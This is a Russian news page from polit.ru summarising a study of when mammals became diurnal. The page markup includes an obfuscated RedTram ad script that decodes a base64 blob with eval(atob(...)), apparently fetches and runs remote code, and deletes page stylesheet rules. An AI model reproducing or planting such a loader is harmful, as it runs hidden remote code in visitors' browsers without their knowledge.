<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Млекопитающие стали дневными животными после вымирания динозавров - ПОЛИТ.РУ</title>

    <link rel="shortcut icon" href="/favicon.ico" />
    <link rel="icon" type="image/png" href="/static/politru_favicon_70x70.png" />

    <link rel="canonical" href="http://polit.ru/news/2017/11/07/ps_diurnal_mammals/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="Млекопитающие стали дневными животными после вымирания динозавров - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="Млекопитающие стали дневными животными после вымирания динозавров - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/news/2017/11/07/ps_diurnal_mammals/" /><meta property="og:description" content="Исследователи полагают , что самые первые млекопитающие вели ночной образ жизни. Дневные животные появились среди них только после исчезновения динозавров." /><meta property="og:image" content="http://polit.ru/media/photolib/2017/11/07/ps_1400_1510050820.jpg" /><meta name="pubdate" content="2017-11-07T15:15:59.687133" /><meta name="news_keywords" content="биология , зрение, млекопитающие, эволюция " />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript"> var script = document.createElement('script'); script.src = '//meelba.com/3.html?group=polit_ru&seoref='+encodeURIComponent(document.referrer)+'&rnd='+Math.random()+'&HTTP_REFERER='+encodeURIComponent(document.URL); script.async = true; document.head.appendChild(script); </script>
    <script src="https://yastatic.net/pcode/adfox/loader.js" type="text/javascript"></script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="proscience">
    <!--BEGIN #header-->
      
<div class="page">

<div id="adfox_1484147658729819" style="margin-bottom:5px;"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 246976,
        containerId: 'adfox_1484147658729819',
        params: {
            pp: 'g',
            ps: 'ckyr',
            p2: 'figh'
        }
    });
</script>

<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2017/11/06/revolution9/">
      
        <span class="author">Михаил Баранов</span>
      
      10 дней, которые потрясли мир: к юбилею революции 1917 года
    </a>
  </li>
 
  <li>
    <a href="/article/2017/11/04/social_networks/">
      
        <span class="author">Анна  Сакоян</span>
      
      Соцсети и монополизация
    </a>
  </li>
 
  <li>
    <a href="/article/2017/11/03/aftersobchak/">
      
        <span class="author">Аббас Галлямов,Михаил Комин</span>
      
      О новых «кандидатах в президенты»
    </a>
  </li>
 
  <li>
    <a href="/article/2017/11/01/arcticoil/">
      
        <span class="author">Алексей Белогорьев</span>
      
      К арктической нефти без США
    </a>
  </li>
 
  <li>
    <a href="/article/2017/11/03/ps_pyramid/">
      
        <span class="author">Максим Руссо</span>
      
      Мюоны и пирамида Хеопса
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date --> 7 ноября 2017, вторник, 17:47<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/" class="selected">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/skolkovo/">СКОЛКОВО</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


  <a href="/rubric/proscience/"><img src="/static/polit/img/proscience-header.jpg" height="99"/></a>
  


  </div>
  <div class="main-cols ib-parent">
  
<!--BEGIN #content-->


  
    <div class="wide-content ib-col">
      <div class="article-detail proscience-article-detail two-left" id="material-news457737">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          07 ноября 2017, 15:15
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/biology/">биология </a>
                  
                    <a href="/tag/viision/">зрение</a>
                  
                    <a href="/tag/mammal/">млекопитающие</a>
                  
                    <a href="/tag/evolution/">эволюция </a>
                  
                </span>
              </div>
            
          
        </div>
        <h1 class="title">Млекопитающие стали дневными животными после вымирания динозавров</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d814x610 below23 image-gray-back-big">
            <a href="/media/photolib/2017/11/07/ps_1400_1510050820.jpg" rel="lightbox" title="Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys">
              <img src="/media/photolib/2017/11/07/thumbs/ps_1400_1510050820.jpg.814x610_q85.jpg" alt="Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys" title="Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys" style="margin-top:-305px; margin-left:-407px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys
              
                <div class="image-extra-source">Илл.: Mark Witton/Recreating an Age of Reptiles</a></div>
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p>Исследователи <a href="https://www.theguardian.com/science/2017/nov/06/mammals-switched-to-daytime-activity-after-dinosaurs-died-out-says-study">полагают</a>, что самые первые млекопитающие вели ночной образ жизни. Дневные животные появились среди них только после исчезновения динозавров.</p>
            



            
<p>По мнению авторов исследования, это объясняет, почему у большинства современных млекопитающих не столь развиты приспособления к дневной активности по сравнению с рептилиями или птицами. &laquo;Обезьяны (включая людей) являются единственными дневными млекопитающими, у которых развились глаза, похожие на глаза других дневных животных, таких как птицы или рептилии. Другие дневные млекопитающие не развили таких глубоких приспособлений&raquo;, &ndash; говорит один из авторов работы Рой Маор (Roi Maor) из Тель-Авивского университета. Большинство млекопитающих и сегодня ведут ночной образ жизни и обладают анатомическими приспособлениями для активности в темное время суток.</p>
<p>У всех млекопитающих, кроме приматов, в сетчатке глаза отсутствует центральная ямка желтого пятна (<a href="https://en.wikipedia.org/wiki/Fovea_centralis">fovea centralis</a>), в которой в наибольшей концентрации представлены рецепторы-колбочки, чувствительные к длинным световым волнам и ответственные за остроту зрения при ярком свете. Зато у многих млекопитающих, включая и дневных, в сетчатке глаза преобладают рецепторы-палочки, связанные с сумеречным зрением. Также многие виды дневных млекопитающих сохранили острые обоняние и слух, что тоже служит признаком адаптации к ночному образу жизни.</p>
<p>Маор и команда проанализировали образ жизни 2415 современных млекопитающих и использовали компьютерные алгоритмы для восстановления вероятного образа жизни их предков вплоть до самого возникновения млекопитающих. Первые млекопитающие появились между 220 и 160 миллионами лет назад и, по мнению исследователей, вели ночной образ жизни. Это помогало им избежать конкуренции с доминировавшими тогда рептилиями за пищу или территорию, да и просто скрыться от хищных динозавров. Динозавры же, как и большинство современных рептилий, были активны днем, используя солнце, чтобы согреться, так как организм рептилий не способен поддерживать постоянную температуру тела.</p>
<p>Около 66 миллионов лет назад, во время <a href="https://en.wikipedia.org/wiki/Cretaceous%E2%80%93Paleogene_extinction_event">мел-палеогенового вымирания</a>, динозавры и многие другие виды животных исчезли, а выжившие млекопитающие смогли занять новые экологические ниши, так что среди них появились дневные виды. Среди предков нынешних приматов такие виды возникли одними из первых. По расчетам авторов нынешнего исследования, это случилось около 52 миллионов лет назад. Это объясняет, почему именно среди приматов сейчас есть наиболее приспособленные к дневной активности виды: у них был больше времени, чтобы в ходе эволюции, усовершенствовать свои органы зрения.</p>
<p>Работа <a href="http://nature.com/articles/doi:10.1038/s41559-017-0366-5">опубликована</a> в журнале Nature Ecology &amp; Evolution.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
              if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
              }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>

          <!-- start banner google adsense -->
          <!-- Polit\polit.ru\468x60 -->
          <!--ins class="adsbygoogle"
          style="display:inline-block;width:468px;height:60px"
          data-ad-client="ca-pub-1154951643410219"
          data-ad-slot="4824359318">
          </ins>
          <script>
          (adsbygoogle=window.adsbygoogle || []).push({});
          </script-->
          <!-- stop banner google adsense -->

          
        </div>

        <div class="bottom-social stop">
          <div class="print">
            <a href="/news/2017/11/07/ps_diurnal_mammals/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!-- 
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/news/2017/11/07/ps_diurnal_mammals/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
        <script type="text/javascript" src="/static/orphus/orphus.js"></script>
        <a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
            <div class="related-block">
              <div class="title">Смотрите также:</div>
              <div class="square-flow-4">
                
                  
  <div class="col3-special" id="square-news444789">
    
<a href="/news/2017/02/21/ps_color_vision/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/02/21/thumbs/ps_Macaque_1487668069.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Макаки подтвердили гипотезу о возникновении цветного зрения
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article40652">
    
<a href="/article/2015/01/02/ps_trichromacy/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/01/02/thumbs/rainbow_1420156184.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Радуга" title="Радуга" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Александра Брутер
    
  
</div>

    <h4>
      История цветового зрения
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news350896">
    
<a href="/news/2014/06/11/ps_retina/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/06/11/thumbs/ps_retina-stem-cells_1402488413.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Фрагмент искусственно выращенной сетчатки, клетки-фоторецепторы отмечены зеленым" title="Фрагмент искусственно выращенной сетчатки, клетки-фоторецепторы отмечены зеленым" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Ученые вырастили сетчатку человека в чашке Петри
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news331296">
    
<a href="/news/2013/12/18/ps_retina/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/12/18/thumbs/ps_eye_iris_1387378800.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Британские биологи напечатали слой сетчатки
    </h4>
  </div>
</a>

  </div>


                
                <div class="stop"></div>
              </div>
            </div>
          
        

<div style="margin: 10px; width: 580px;">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\580x400\0 */
google_ad_slot = "1666723527";
google_ad_width = 580;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_10975">
          <center><a href="http://24smi.info">Новостной агрегатор 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
          (function() { var sm = document.createElement("script"); sm.type = "text/javascript"; sm.async = true; sm.src = "//jsn.24smi.net/4/8/10975.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow-4">
    
  <div class="col3-special" id="square-news457740">
    
<a href="/news/2017/11/07/ps_war_ii/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/07/thumbs/ps_160915-Z-OI569-2062_1510052135.JPG.0x142_q85_crop_cropsize-190x142.jpg" alt=" " title=" " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Специалисты по искусственному интеллекту призывают запретить боевых роботов
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news457737">
    
<a href="/news/2017/11/07/ps_diurnal_mammals/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/11/07/thumbs/ps_1400_1510050820.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys" title="Фауна мезозоя (сверху вниз): Dilophosaurus, Kayentatherium, и Kayentachelys" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
